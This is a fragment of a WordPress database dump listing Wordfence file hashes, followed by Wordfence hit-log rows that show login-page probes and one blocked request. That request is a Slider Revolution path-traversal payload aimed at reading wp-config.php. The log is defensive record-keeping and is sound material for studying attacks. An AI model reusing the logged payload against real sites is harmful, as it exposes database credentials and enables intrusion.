(0xfc8970b78a0739bd367f17c3a8e552e6, 'wp-admin/css/common.css', 1, 0x00000000000000000000000000000000, 0xe573595eef2d3bfd7767fdec685b1bae, 0xdff85a010a3c2dcd704a0abc1aee47d48b858e108ecc38b58d5c84936bc2a87a, '', 0, '?'),
(0xfc90d109cc1742106328a7d846b092e7, 'wp-content/plugins/revslider/includes/framework/colorpicker.class.php', 0, 0x46b180efc2c111a37aef5114c6683fad, 0x46b180efc2c111a37aef5114c6683fad, 0xb0b47844f35a54eb7d443b23e73eb55be0ab73caac1f6748a55b94207ae8e57f, '', 0, '?'),
(0xfc98958cb51cc6aa71a5e682b38b0cd0, 'wp-includes/js/tinymce/plugins/paste/plugin.js', 1, 0x00000000000000000000000000000000, 0x6d4e3950e0b34d1b188c3c49a5604f00, 0xd1717468577272f45764f714ec94256dcabfd583cc4edd2ba32812c1a5142d84, '', 0, '?'),
(0xfc9a6c7879fd1ac21bf9d4c416229691, 'wp-content/plugins/wordfence/views/scanner/options-group-scan-schedule.php', 1, 0x00000000000000000000000000000000, 0xc5b9bf9f2ddc897c9dc2e14a9ff2ad55, 0x10c210560fa38a0d638937b2a467a336dbe68aadf48dfe56dffe6d9443d81b50, '', 0, '?'),
(0xfcb78f71f3904cf8f33ed4c62351c400, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/ChaCha20/Ctx.php', 1, 0x00000000000000000000000000000000, 0xf195fa8cc5f4f44298eca8e26759f0e9, 0xfbf5913ae2495a19aeed43fda25a95da1438c1c8b0f49b4c1b9ae55de9996da9, '', 0, '?'),
(0xfcbb3c6ce66117ac802c9b62582cb3b2, 'wp-admin/images/xit-2x.gif', 1, 0x00000000000000000000000000000000, 0x9cd381c6753a40340d85e2c57a3c35c8, 0xa8530dce7d1140bd137e51f73a805363b5b1a7ea192a642be55ace5fbe7bac52, '', 0, '?'),
(0xfcc51807a23265027f278924cedf1a4c, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_battery_20_24px.svg', 0, 0xdb6d71751cffbd70fa3ae126126d9865, 0xdb6d71751cffbd70fa3ae126126d9865, 0xce5264d7a4bf70531a78bf2971f72e5d58fe2aa0a190c78af50c0a689eb518cd, '', 0, '?'),
(0xfcc7caa884000913eaba648c0669e748, 'wp-content/plugins/js_composer/assets/lib/bower/vcIconPicker/jquery.fonticonpicker.min.js', 0, 0xbcd0fe8d5676867b9916d50f7b453e27, 0xbcd0fe8d5676867b9916d50f7b453e27, 0x8b73a10469aa9d28ec8017371ed59af39c8b0fab027325df157d60c71e29a89b, '', 0, '?'),
(0xfce3fb0cd63aa9b36d1350a8b4f0bccb, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_shop_two_24px.svg', 0, 0xbd896cb016912eefc40c68b70a418d17, 0xbd896cb016912eefc40c68b70a418d17, 0x93ab4fe8a4c963ef5e24f1cb4236493161430bc891caf71c7efffeab6f08947a, '', 0, '?'),
(0xfd0ff651def6498ece6038b46dc64417, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_raw_html.php', 0, 0x9b3d2b2161f8a788f491956aad378f82, 0x9b3d2b2161f8a788f491956aad378f82, 0x1fcff878b6eecbba649556893597879b4f64d114a2fe8a58acc28d0f5c068c57, '', 0, '?'),
(0xfd2b0b715e65b795e9e36775cf46360a, 'wp-includes/theme-compat/embed.php', 1, 0x00000000000000000000000000000000, 0xc805c5a273be5ed0f4bb71a20f6362ff, 0x57f5dcf43554a670c1aa3b192da56eac8830bb618b95baa94f0a19d315f4a692, '', 0, '?'),
(0xfd2f83a9abaf2c1215c67cfed05d3c06, 'wp-content/themes/Impreza/framework/plugins-support/the_events_calendar.php', 0, 0xf664623f814cc7ab7ea0cf4d5f0c6d92, 0xf664623f814cc7ab7ea0cf4d5f0c6d92, 0xd404f63f8c8f91701f7a190be84ad2dddc60c4aaf82d82e1b6fca1ec1d8ffcd7, '', 0, '?'),
(0xfd3caceb3c5b0b6e5c7086eb0f308d0f, 'wp-content/plugins/revslider/admin/views/system/validation.php', 0, 0xd41d8cd98f00b204e9800998ecf8427e, 0xd41d8cd98f00b204e9800998ecf8427e, 0xe3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855, '', 0, '?'),
(0xfd47fe9db2212368d41113390984f226, 'wp-includes/js/tinymce/plugins/wordpress/plugin.js', 1, 0x00000000000000000000000000000000, 0xabfe8ead341e68cfee6625b6d5627a0d, 0x0ed23c185b91fd6fd9ffa755b8e7c5c7d3b729bc160fee4527516b30d26f532f, '', 0, '?'),
(0xfd4b056af21818e2aa160b68ba91e8f9, 'wp-content/plugins/wordfence/images/loading_background.png', 1, 0x00000000000000000000000000000000, 0xacf427e932fb9413700a4b8b58b41eec, 0xcdce8e2558efc59646bcffe7dcf23173cf3bc01bce174ceb7a721618e792bb11, '', 0, '?'),
(0xfd60536be5c5375474e07f76b9a058bd, 'wp-includes/class-wp-list-util.php', 1, 0x00000000000000000000000000000000, 0x3d983a5780450e085eb5eb3d97608bde, 0x19c5aabbb8185c11c7cdb7bbaf8bbc90c1620b34ab74ae7d6675b7c716e44ed3, '', 0, '?'),
(0xfd7573db5407c2ad42e2fab5e4ac420c, 'wp-content/plugins/wordfence/images/sort_desc_disabled.png', 1, 0x00000000000000000000000000000000, 0xbda51e15154a18257b4f955a222fd66f, 0x5e2a1fc76e5ed7006d2ba68b214e6bcac98c0b130cf39f18cf2fa9bfd4af5e6b, '', 0, '?'),
(0xfd8f92100e0b5a4c8b8f4f926cd6e114, 'wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/Xsalsa20.php', 1, 0x00000000000000000000000000000000, 0x900ba64306eda2951ef046e69668f47a, 0x6fc5910a77a66ebecb704c942b3bd0cceddf7e8ba87432b405502ac6833616f8, '', 0, '?'),
(0xfd9b477aa2186bcdc5746607f3362281, 'wp-content/plugins/js_composer/assets/vc/vc-element-icons/element-icon-separator-zig-zag.svg', 0, 0xcf9c1ce8a5d9f892f1e073b6ed436fde, 0xcf9c1ce8a5d9f892f1e073b6ed436fde, 0x2276c4c06012efc21057cc2e4bcb9a899950ee2c25719fe30d135e0b48a313df, '', 0, '?'),
(0xfda9d57f27e68042e2088aad37531dc2, 'wp-includes/js/zxcvbn-async.js', 1, 0x00000000000000000000000000000000, 0x133d902461d45b5a46295e0a9f13f17e, 0xd675eebabc5139d2ab7b12bdbc376f037d0ef980edb6ee05e660df2d6e5701c6, '', 0, '?'),
(0xfdaa59d64e972ac72ae20a75ee52030b, 'wp-content/themes/Impreza/framework/shortcodes/us_btn.php', 0, 0xf6e5520de11330862367c7bb0b1afefe, 0xf6e5520de11330862367c7bb0b1afefe, 0x32bfcbe2ae32e6a4700f7db8f985e275d91b844c7b849eb7de371256d38e11e1, '', 0, '?'),
(0xfdab4868f1efc6494ca652c3b757e9e5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_copyright_24px.svg', 0, 0xf932d4d8d4ffaa316f47bde38eada816, 0xf932d4d8d4ffaa316f47bde38eada816, 0xc5d79182e92289895d3b860c9fdea1f0a3d05a7ee8cbdd364644e1f56e8da02a, '', 0, '?'),
(0xfdad0e047ba0090a7c1d70a3041bd9a4, 'wp-includes/customize/class-wp-customize-nav-menu-item-setting.php', 1, 0x00000000000000000000000000000000, 0xae8c64e65397f20fd4d0782877018ade, 0x71cc40f0f2c871a29abf309e1cf4a49a7f700a5a6b40adbe13edcd0c01afa30a, '', 0, '?'),
(0xfdb4f6d7f8f529dd28a4d03c1f07d9dd, 'wp-includes/js/json2.min.js', 1, 0x00000000000000000000000000000000, 0xc5fe2b8725d6986faa885f6dcc1771dc, 0x04c9b1e9a615cbc397d523abab06ef322ec59df917f18ab3c7d8c20a5471374e, '', 0, '?'),
(0xfdc7400d720721e158db8e397b54f182, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/keyboard.svg', 0, 0x2b53e483bae2fef14d6f88813c323ed9, 0x2b53e483bae2fef14d6f88813c323ed9, 0x6b5024fae9bbcf8ed83d77930934a37b4327a21a4cf181a378ae56f169f82af6, '', 0, '?'),
(0xfdcd6184ed274054e791938903f5d6ca, 'wp-admin/images/date-button.gif', 1, 0x00000000000000000000000000000000, 0x762130cf9d24c70a2de6bdae4ce5cc54, 0x68c9c5b5ceb4e498bcf9ef6e24b086dbf3cf1bea1ea3b98be8051471214923fa, '', 0, '?'),
(0xfdd09ffac09f697c681cdfa493744b90, 'wp-content/plugins/Ultimate_VC_Addons/presets/Ultimate_Pricing_Tables.php', 0, 0x15e71bfe4bef41cf4013e4e4a2d23369, 0x15e71bfe4bef41cf4013e4e4a2d23369, 0xd1f43fb9006193d836e29bed4bc16a27bff2ecd4faccf78b38eca5975d579b03, '', 0, '?'),
(0xfdda0946c22a884f624aaac6358d7af4, 'wp-content/plugins/wordfence/js/Chart.bundle.min.1579191227.js', 1, 0x00000000000000000000000000000000, 0xbaf1f3355d948a64eec0a0fb648066dd, 0xb9d63ec5e160159d89fabd7fb4b04e4e05ad60eb4e224ba0d39e639f6b473c3b, '', 0, '?'),
(0xfdfbdccf76d5bb01615239bb9db64cf6, 'wp-content/plugins/revslider/public/assets/assets/svg/busy-icons-svg/chart06.svg', 0, 0x6c129fe2ea6104a24b40569e4c7628f9, 0x6c129fe2ea6104a24b40569e4c7628f9, 0x47f0c84df17f6150de5835fa2a2d45ba704ded3450930253ae65c13ef4afa705, '', 0, '?'),
(0xfdfe33c45296637dde647060d5f015d0, 'wp-content/themes/Impreza/framework/shortcodes/us_testimonial.php', 0, 0x43a1a0cc9b1062cc2bfe2b62dd6db6a2, 0x43a1a0cc9b1062cc2bfe2b62dd6db6a2, 0x03335fb844ac836f97f7f4edbb3904d7729ffa8d0e86e73e93d46a8dd0fc2d61, '', 0, '?'),
(0xfe0ef8ee79d1ef995c2f4582cda5173c, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/SmoothScroll.js', 0, 0x8fb64c2ed863baf350e9fe7f00a6f7e1, 0x8fb64c2ed863baf350e9fe7f00a6f7e1, 0x5ff0b3c07aec7879d9aa8287cd5bd7d0ac5e1de47bf777a3ad3a5528aa985f44, '', 0, '?'),
(0xfe0f23b535e0adb372a7dfd9ec9bf981, 'wp-content/plugins/js_composer/assets/lib/bower/bootstrap3/js/scrollspy.min.js', 0, 0x19b789622cfe38fd10ebeb0965fe9f7a, 0x19b789622cfe38fd10ebeb0965fe9f7a, 0x5ffe62cde7b86da0e9c0960de6fe9804f16ee7a843cebf8bb56cd44bcd17b059, '', 0, '?'),
(0xfe15eb828f0d3f385b39806b51271d73, 'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php', 1, 0x00000000000000000000000000000000, 0xff388445cbf337074397f69ffe950c53, 0x06648de2d982fbca4d2e4e38559838ffe0a0864fc8e5e4599db8a33de577d144, '', 0, '?'),
(0xfe162754fa9fe5f4cc81ade959b2c799, 'wp-includes/customize/class-wp-customize-cropped-image-control.php', 1, 0x00000000000000000000000000000000, 0x47e1705be410717d79fd0504aa310f87, 0x138e780d3a9a9c13f382f6cd7d11af9a675229ea609f9a199d1982d76b924d25, '', 0, '?'),
(0xfe18a38ad6535fa5ccb608586af4b052, 'wp-content/plugins/wp-super-cache/rest/class.wp-super-cache-rest-get-status.php', 1, 0x00000000000000000000000000000000, 0x9676f02f71f4385524010d3362566fa2, 0xccba651066640828aba759cc754443e1ecb5067a40929d21148b82aa4caa26ae, '', 0, '?'),
(0xfe1bfdfe819c03297a5d213fbbb161c0, 'wp-admin/images/media-button-video.gif', 1, 0x00000000000000000000000000000000, 0xc2d206df3efdc0db758b8065ad77f04a, 0x59a265b897dc226e2bf223401013acf5bec6bc865a8286c467e1905650fee927, '', 0, '?'),
(0xfe257cddbdb03e3f767b6aca1311b706, 'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php', 1, 0x00000000000000000000000000000000, 0x3a9d3edea488802b7ece74cdabbfae2a, 0x497c82a405115ecf8867b33f6ec68f17419f64f319f69fbeeb5d363852f6e316, '', 0, '?'),
(0xfe29729d9fc3b382bb4679126ed5b787, 'wp-content/plugins/js_composer/assets/js/vendors/woocommerce.js', 0, 0xd1d7da51ffbe0bb8bd200aa07caa077b, 0xd1d7da51ffbe0bb8bd200aa07caa077b, 0x6c76d0b4f97baf8d0714d139d0a0631476ea06dd36dd29c1ec25feae95e6745e, '', 0, '?'),
(0xfe404ae8017ff5035d1f6b61c008803d, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_airplanemode_inactive_24px.svg', 0, 0xed155e2751ce5731da9c05edc1a410bc, 0xed155e2751ce5731da9c05edc1a410bc, 0xb19e668952d6b8a8be81836d3b721bcebd9540ab71a568c9b6f137db63b3f9f4, '', 0, '?'),
(0xfe46cf25adb3430fc2d43081bba3a12c, 'wp-admin/css/list-tables-rtl.min.css', 1, 0x00000000000000000000000000000000, 0xcb2e1d966b121d6b85775afab729a54a, 0x8dd7efa471fdd9605abcfcc096fe7dffd2b8177071cb89da5d2f4b0adec0dc6f, '', 0, '?'),
(0xfe4922ed70a2d074ca51b9c95b5a3678, 'wp-includes/css/admin-bar.min.css', 1, 0x00000000000000000000000000000000, 0x990729b33128aba139f4ca6f9c3d26db, 0x28b181afd2013add4774875ff81edfb83e29e61f3239928092b4dd726de112af, '', 0, '?'),
(0xfe57705bec3c4b91aa92e111b4d1d784, 'wp-content/plugins/revslider/public/assets/assets/svg/communication/ic_forum_24px.svg', 0, 0xa323b6355c23b5a3ab8e4e8a9aef08c5, 0xa323b6355c23b5a3ab8e4e8a9aef08c5, 0x14fd16ef174846bf533a7fd83917fb937a021cd3a35eb1035d0ac0c2e0b6fc14, '', 0, '?'),
(0xfe63b5d4776b9d2894910ff8348d33c3, 'wp-admin/includes/list-table.php', 1, 0x00000000000000000000000000000000, 0x112c312f9ad17b94520a7d3bfef882e3, 0x9468e00c354f2a7a5c8a8dca066f0bcced33855d60d2db0750df0c8f4769bc93, '', 0, '?'),
(0xfe6756dce0d6484977139ed321b592c0, 'wp-includes/css/customize-preview.css', 1, 0x00000000000000000000000000000000, 0x4c4992759e2e9171987ee83c2b4ff8f6, 0x53e7e7009020978ec295ece454d81b2ea04329e3b2304be7c8c185001a44a89f, '', 0, '?'),
(0xfe7f5119d6bf361193c87971e4a23838, 'wp-includes/theme-compat/footer.php', 1, 0x00000000000000000000000000000000, 0x5975807ce515bb6624f4a28701a49c8c, 0xa6c28ca4020ac7e0d92ad2feee72cfe12dcf89855edfa348b844ad62df9ae4c2, '', 0, '?'),
(0xfed83a1fc44e9620e021d98d93c19c82, 'wp-content/plugins/js_composer/include/templates/editors/partials/post_shortcodes.tpl.php', 0, 0x3ff142c1bf9d3deb39c2fd8958f39541, 0x3ff142c1bf9d3deb39c2fd8958f39541, 0xa8e9742928a88f7d1cfcfa583d98adf91038c365b348f604539d80e10c2b04fd, '', 0, '?'),
(0xfee0a203bf77039bf1190827a2362907, 'wp-includes/rss-functions.php', 1, 0x00000000000000000000000000000000, 0x559c28627ab35fc9598062615507704b, 0x13ea06ce50680b967196cd9ec293a818879bb43bb4a26c225a421422d8dd065f, '', 0, '?'),
(0xfeeac6f6d51b4eba0cb739a5017bae3b, 'wp-includes/js/mediaelement/wp-mediaelement.min.js', 1, 0x00000000000000000000000000000000, 0x2b67f971fa55ec7f55b25c0af6f459a1, 0x2e79731b3ee6f76b12b735be0f6cc9947f9cd55a69253d1e11cc1566c8355d6b, '', 0, '?'),
(0xfeee2e88a0199449ee0a6671f1024d39, 'wp-includes/sodium_compat/src/Core/Poly1305.php', 1, 0x00000000000000000000000000000000, 0x21f0699cd14cb3563d582bb20976307e, 0x34e7ce2d3c34ae2c2256b2c8b158ca98c3ae0eca685297094bfe46eb6ba1141e, '', 0, '?'),
(0xfef0cbf559715f5bb7e70bae409b1be9, 'wp-content/plugins/revslider/public/assets/assets/svg/notification/ic_time_to_leave_24px.svg', 0, 0x5d98e3673e707eb3c2cbc4ccdcbca276, 0x5d98e3673e707eb3c2cbc4ccdcbca276, 0xca500f161d8ff3b82c745abb0b25a857bd4478579993404f0e77a9605a2c2f8e, '', 0, '?'),
(0xfef80293c9a0be68704a1e444e1d37a5, 'wp-content/plugins/Ultimate_VC_Addons/assets/js/count-timer.js', 0, 0xc4c1c7a2c1d00c15d2da2694f24f4538, 0xc4c1c7a2c1d00c15d2da2694f24f4538, 0x32c09df5e47859071a73a025ddc37fddc0ab0ad7ca2b0566a863f8e080dce001, '', 0, '?'),
(0xff16c14e7e1cabcc6adc12de2f73955f, 'wp-content/plugins/revslider/public/assets/assets/svg/image/ic_style_24px.svg', 0, 0xaaea5224acf1040cd8d4a5ee9c8a1f1e, 0xaaea5224acf1040cd8d4a5ee9c8a1f1e, 0xb640f46c3154ce7afd5696b7348cba05ff1de6b3cfcc13575b059bf13d7291be, '', 0, '?'),
(0xff288b7ee63f022330f7e995cbd2b9f3, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_screen_lock_landscape_24px.svg', 0, 0x8e229f74d73de6a3596f10a78d9fa3c1, 0x8e229f74d73de6a3596f10a78d9fa3c1, 0xdcd5b36521b7847da323b0dd1e5b7df2c692abcfdf62e72bd1e166d58df71e3c, '', 0, '?'),
(0xff3b0860ba2472e79fcbd124b39ea63d, 'wp-content/plugins/wordfence/images/icons/warning128.png', 1, 0x00000000000000000000000000000000, 0x70cf47c01949d7742af693c6ca4e703d, 0xf9b9e4de2a10932f82d81f1fe404c8be739bf874e841fe88b8d27f7d2e62275c, '', 0, '?'),
(0xff453538bef979aae4d45773d64fbad5, 'wp-admin/css/admin-menu.min.css', 1, 0x00000000000000000000000000000000, 0xd17dc4b834c38295ee7d3fd3339eff8b, 0x9f8e0caabb92cf3bb887364a1c06890dac0c649e566dd5f498d3c11aef49cae4, '', 0, '?'),
(0xff4cd9f3eaf3906535783f653de68826, 'wp-includes/js/plupload/wp-plupload.min.js', 1, 0x00000000000000000000000000000000, 0xcc93057ecab25b3d7ea1385cf9475654, 0x84945f0437201f6183b8f258622668ff7ee86fe9d6007bf7fdde32c76ccc15d7, '', 0, '?'),
(0xff5153be32f523cdc3c15db8737274d4, 'wp-includes/sodium_compat/src/Core/BLAKE2b.php', 1, 0x00000000000000000000000000000000, 0x8a20cad9392d8ea84b9bf0e0392ce51f, 0xb2e696ad38d55ab6a12e38cef867e5aa4b6cc832ae97262e4d8405824f08c11c, '', 0, '?'),
(0xff6b1c8c0ff9fecf5050999801313cc3, 'wp-content/plugins/wordfence/crypto/vendor/composer/autoload_files.php', 1, 0x00000000000000000000000000000000, 0xea6f750e10cd6ce7db075f9b3440aba6, 0x366225208d22c4cab473d14aeb027033b0bfb7e738d3b78353c7993afab18391, '', 0, '?'),
(0xff6c9cb90a2e18b8fc62918eae92f716, 'wp-content/plugins/js_composer/include/templates/shortcodes/vc_gallery.php', 0, 0xf94290d8ffa01cc39cb8667b759d96e6, 0xf94290d8ffa01cc39cb8667b759d96e6, 0x434641073d44526363875fba504a09a91ee6c2f5d47fa6356934f97dd3a0572c, '', 0, '?'),
(0xff87b7d64d7e0404eb5e78f9bc3b87f0, 'wp-content/plugins/wordfence/lib/unknownFiles.php', 1, 0x00000000000000000000000000000000, 0x6ef6e813bde29c9a6f222a9c20a71262, 0x70dd7d278f35cbce08485a25bf5b2ae5c73a5e955e03b1aeb8feace582fed569, '', 0, '?'),
(0xff9035a57391f7abcf0b9e4df501b571, 'wp-content/plugins/revslider/public/assets/assets/svg/device/ic_bluetooth_disabled_24px.svg', 0, 0x334c318a167991234246d40a84f661fc, 0x334c318a167991234246d40a84f661fc, 0x0b63f8f310e8580b86c6052c2e31582d00d0df93f83f66a2178ff1f231e6727f, '', 0, '?'),
(0xff90986743555e83cb50448acc8184e5, 'wp-content/plugins/revslider/public/assets/assets/svg/action/ic_book_24px.svg', 0, 0x01133baa9e4359b5f33b8d680307f950, 0x01133baa9e4359b5f33b8d680307f950, 0xb28798fc1ac87132379d8d3a9cf36b810593bd7ea86308154c3a1d846d8bf413, '', 0, '?'),
(0xff92dd6a8ac8bfbf219497b4a795c266, 'wp-content/plugins/js_composer/assets/fonts/vc_grid/vc_grid_v1.svg', 0, 0xbc4f2891f8d58624fab45627ce7cd946, 0xbc4f2891f8d58624fab45627ce7cd946, 0xe92af99513544fcd0608ec7881ed55e869b7d4f25f0036556fb48674b197a2ea, '', 0, '?'),
(0xff977e25429700837a98ee07f53f6f0f, 'wp-includes/IXR/class-IXR-message.php', 1, 0x00000000000000000000000000000000, 0xff847c4c6e95a9147d44fbd7e8313497, 0x6c797d10bea97afba82ee0176a78a4adaa6dc7edd4e4059e11a53aebfa556c60, '', 0, '?'),
(0xffa861355b34fc053515bc4d659d7043, 'wp-includes/js/jquery/ui/effect-bounce.min.js', 1, 0x00000000000000000000000000000000, 0x030dc5d899ab0c2191629d74281f7781, 0x27ee317cf80dba02ab3f504a6ea45ab1fa0954864bbc20778f36e9f6e605c810, '', 0, '?'),
(0xffb51c53a94305520343fefc076cb8c5, 'wp-admin/css/colors/sunrise/colors.scss', 1, 0x00000000000000000000000000000000, 0x5692871a8a7a1914ee0968ddf9923dec, 0xfde2af515f6e9f893937ca134c3284f324a2ee79073a6ae053d18587a0cec5c1, '', 0, '?'),
(0xffc4ea6bb5cb69eed02ebca5b85ca593, 'wp-includes/images/smilies/icon_neutral.gif', 1, 0x00000000000000000000000000000000, 0x1816d8e65601024d3348553121e19876, 0x9ea4eb0b4f690b10733800f97c7a10f30bf736c75d65a899405988166d343907, '', 0, '?'),
(0xffdbef407e7d638784d851dd2783bf4a, 'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php', 1, 0x00000000000000000000000000000000, 0x828625e2fd39f4e13b2586f26d4d365a, 0x36f92d1805cc329e586add925b1bc86caae381c3864c02ef8cb0097f2738464a, '', 0, '?'),
(0xffe13de338ba7a28fd733067f970875f, 'wp-content/plugins/revslider/public/assets/assets/svg/maps/ic_navigation_24px.svg', 0, 0xca8f3263c04ce569d10dc4ad1f23602b, 0xca8f3263c04ce569d10dc4ad1f23602b, 0xbfc994bf01bc655625c45f0b0bb558932243937798e8a1a2f60ba469d1307f96, '', 0, '?');

-- --------------------------------------------------------

--
-- Tablo için tablo yapısı `zdenl_wfhits`
--

CREATE TABLE `zdenl_wfhits` (
  `id` int(10) UNSIGNED NOT NULL,
  `attackLogTime` double(17,6) UNSIGNED NOT NULL,
  `ctime` double(17,6) UNSIGNED NOT NULL,
  `IP` binary(16) DEFAULT NULL,
  `jsRun` tinyint(4) DEFAULT '0',
  `statusCode` int(11) NOT NULL DEFAULT '200',
  `isGoogle` tinyint(4) NOT NULL,
  `userID` int(10) UNSIGNED NOT NULL,
  `newVisit` tinyint(3) UNSIGNED NOT NULL,
  `URL` text,
  `referer` text,
  `UA` text,
  `action` varchar(64) NOT NULL DEFAULT '',
  `actionDescription` text,
  `actionData` text
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

--
-- Tablo döküm verisi `zdenl_wfhits`
--

INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(4555, 0.000000, 1594395611.295286, 0x00000000000000000000ffff23e41b57, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://www.schobertechnologies.com/wp-login.php', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4556, 0.000000, 1594404537.024857, 0x00000000000000000000ffff224e44a1, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://reurbe.pt/administrator/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4557, 0.000000, 1594408360.664091, 0x00000000000000000000ffffb955bfc9, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4558, 0.000000, 1594411479.864990, 0x00000000000000000000ffffb9dc64f4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4559, 1594411694.662722, 1594411694.605800, 0x00000000000000000000ffff505244ca, 0, 403, 0, 0, 0, 'http://www.ze-dent.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php', NULL, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36', 'blocked:waf', 'Slider Revolution: Local File Inclusion', '{\"learningMode\":0,\"failedRules\":\"2\",\"paramKey\":\"c2VydmVyLnNjcmlwdF9maWxlbmFtZQ==\",\"paramValue\":\"L3Zhci93d3cvdmhvc3RzL3plLWRlbnQuY29tL2h0dHBkb2NzL3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":0}'),
(4560, 0.000000, 1594415989.938059, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4561, 0.000000, 1594418434.650572, 0x00000000000000000000ffff224e44a1, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://warsztat-struga.com/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4562, 0.000000, 1594426306.904015, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4563, 0.000000, 1594434428.257574, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4564, 0.000000, 1594436009.293480, 0x00000000000000000000ffff224e277b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://apnaplan.com/wp-login.php', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4565, 0.000000, 1594439576.359613, 0x00000000000000000000ffff224e277b, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://holzwerk-dp.de/administrator/', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(4566, 0.000000, 1594443229.342141, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4567, 0.000000, 1594448796.201933, 0x00000000000000000000ffff33c388be, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0', 'loginFailInvalidUsername', NULL, NULL),
(4568, 0.000000, 1594456211.389991, 0x00000000000000000000ffffb956a46c, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(4569, 0.000000, 1594460327.833277, 0x00000000000000000000ffff224e277b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://parimatchk-zerkalo.ru/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
